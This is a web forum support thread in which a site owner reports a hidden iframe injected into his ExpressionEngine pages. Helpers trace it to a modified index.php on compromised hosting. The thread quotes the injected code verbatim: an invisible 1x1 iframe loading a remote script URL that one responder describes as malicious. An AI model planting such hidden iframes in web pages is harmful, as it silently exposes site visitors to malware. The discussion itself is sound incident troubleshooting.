Thread

Hey guys,

I have a small problem. I’m working on this website(the language is romanian), and for some unknown reason an iframe appears automatically after the html tag is closed. Something like this:

</html>
<iframe src='http://62.176.16.193/tds/?id=1' width='1' height='1' style='visibility:hidden'></iframe>

I really don’t know if EE does this,  it’s not the core version. This is the reason the code is not valid, if I manually check the code removing it, it validates. The website works fine, but I still want it valid.

Thanks,
Stefan

I really don’t know if EE does this,  it’s not the core version. This is the reason the code is not valid, if I manually check the code removing it, it validates. The website works fine, but I still want it valid.

1. NOPE. ExpressionEngine does not output any code that you do not insert yourself.
2. I followed the link in the iframe, and it points to some javascript code. It looks malicious to me.
My advise would be to contact your host and alert them to a vulnerability to your site.

It appears to me that someone else inserted that code, if you didn’t.

As for your validation, I just checked your site, and I see the above iframe as well as a second one. You’ve got to clear those out first.

Another validation issue is the following code snip:

<li class="sep"></li>

Which appears 8 times in your homepage.

Info: Doctype given is “-//W3C//DTD XHTML 1.0 Strict//EN”
Info: Document content looks like XHTML 1.0 Transitional

It’s seems like my pc was infected. Now I’m trying to figure out how to remove the iframe, because I don’t find it anywhere. Not in the templates, not in sql.  Any ideas?

@OrganizedFellow: The doctype was changed also by the malware, and it validates with that class, even it’s empty. Thanks for the help 😊

Hi, Stefan - I have moved this to technical support.  This looks like it may be a security breach.

Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

1. EE version and build (found at the bottom of your control panel)
2. Other scripts on your account, whether in use or not (phpBB, etc…)*

* If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

While we work through this, please check through these files:

* path.php
* config.php
* index.php

to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

You may also wish to refresh your files by following the build update instructions.

Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

1. Build:  20080118
2. There are not other scripts installed on this case, but I also “infected” a friend’s blog, bassed on Wordpress.

Right now I’m preparing to reinstall the operating system on my pc and I will keep you posted with the results. As I already said, I don’t believe it’s a EE bug.

The only thing I’m afraid is that the infected code was send every time I wrote an entry or updated a template. The frustrating thing is that I don’t see that code anywhere, and I scanned my PC twice, with different programs, but none found something. I find the name of the infected file on a russian website, but didn’t understood too much, just got the name of the file (S87ekhV.exe) and deleted it. Still, the problem isn’t solved.

I’ll be back with updates. Thanks for the support.

Ok, Stefan, wait.

I strongly doubt this is your PC.  Have you spoken to the host?  The hackers probably came through the shared hosting system and your host can let you know *where* they gained entry from.

Did you check the files as suggested in my response?

Oh…sorry for my bad english :D

I just finished reinstalling the OS and I checked the files. You were right, the code was inserted in index.php…the two EE based sites are hosted on different webservers (from different providers)

edit:

I can tell for sure that the file was modified when I wrote a post. On one of the two sites I didn’t made any ftp transfer since last week, and yesterday the code was ok, so that’s the only way the script could be injected in the file.

Stefan, did you talk to your host? It is likely that a third party got into the server and modified that file - and that it had nothing to do with any action you took. You need to talk to your host and find out what happened, and alert them so that they can stop it from happening again.

I’m still waiting for their answer. Right now here it’s 1:45 am, so I can’t call them now. I will do it tomorrow.

Thanks again for the great support 😊

@Stefan
There really was no need to reinstall your OS. But since you did, you are clear on that end.
If your host does not resolve the problem(s) to your satisfaction, it may be time to switch hosts!

The host said no other website was affected, so I guess that’s it. My problem is solved, but still can’t figure out how they hacked me.

Thanks again for your help 😊

Stefan - did you ask your host to research it and find out how they got in?  What did they say?

They asured me that there was no security breach. They said that the files corrupted were in directories with chmod 777, and that’s the reason the attackers could paste the code.

I think I will switch to another host soon.

I think I will switch to another host soon

Sounds like a good idea to me.

Well, un-authorized third parties putting malicious code in your files is a security breach.  *shakes head*  In any case, see This comment about permissions and security. =)